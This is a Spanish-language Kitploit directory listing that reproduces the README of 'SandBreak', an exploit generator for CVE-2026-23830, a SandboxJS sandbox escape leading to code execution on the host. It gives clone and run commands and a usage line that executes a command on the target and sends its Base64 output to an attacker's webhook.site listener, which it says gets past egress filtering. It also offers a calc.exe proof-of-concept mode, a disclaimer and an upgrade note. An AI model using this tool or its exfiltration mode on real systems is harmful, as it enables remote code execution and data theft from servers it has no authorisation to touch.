Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Genera y entrega payloads de explotación para CVE-2026-23830, una evasión de SandboxJS, con modos para exfiltración OOB ciega y PoC de calc local. Admite listeners HTTP/HTTPS y produce payloads de JavaScript minificados.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
114hace 7 mesesAún no revisado
Compartir

SandBreak

Generador de Exploits CVE-2026-23830 y Herramienta Auto-Pwn

Go Version License Type

SandBreak es una herramienta robusta de generación de exploits basada en Go, diseñada para aprovechar la vulnerabilidad de escape de SandboxJS (CVE-2026-23830).

Esta herramienta explota el constructor AsyncFunction sin protección en versiones antiguas de sandboxjs, permitiendo a los atacantes salir del entorno sandbox de V8 y ejecutar código arbitrario en el sistema host. Soporta múltiples modos de payload, incluyendo Exfiltración OOB Ciega, Defacement y RCE Basado en Errores.


Características

  • 2 Modos de Ataque:
    • oob: Exfiltración de datos fuera de banda (HTTP/HTTPS) para escenarios ciegos.
    • calc: Abre calc.exe (PoC clásico).
  • OOB Inteligente: Detecta automáticamente HTTP vs HTTPS para evitar fallos del servidor.
  • Basado en Go: Binario único, sin dependencias requeridas en la máquina del atacante.
  • Ligero: Genera payloads de JavaScript puros y minificados.

Instalación

Clona el repositorio y ejecuta:

git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

Uso

go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. Modo OOB (RCE Ciego - Profesional)

Úsalo cuando no tengas retroalimentación de salida. Ejecuta el comando y envía el resultado codificado en Base64 a tu listener (por ejemplo, webhook.site).

go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

Omite con éxito los fallos básicos de filtrado de egreso manejando errores de red.

2. Modo Calc (Prueba Local)

Abre una calculadora en el servidor Windows.

go run CVE-2026-23830.go -mode calc

Prueba de Concepto (PoC)

Escenario: Exfiltración OOB

El atacante recibe los datos del usuario del servidor a través de Webhook a pesar de no haber salida visual en el sitio.


Aviso Legal

Esta herramienta está creada únicamente con Fines Educativos y para Pruebas de Penetración Autorizadas.

  • No uses esta herramienta en sistemas que no poseas o para los cuales no tengas permiso explícito de prueba.
  • El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.

Mitigación

Actualiza sandboxjs a la última versión donde el constructor AsyncFunction esté correctamente aislado en sandbox.

npm update sandboxjs

Autor: Meysam Bal-afkan

Licencia: MIT

Descargar herramienta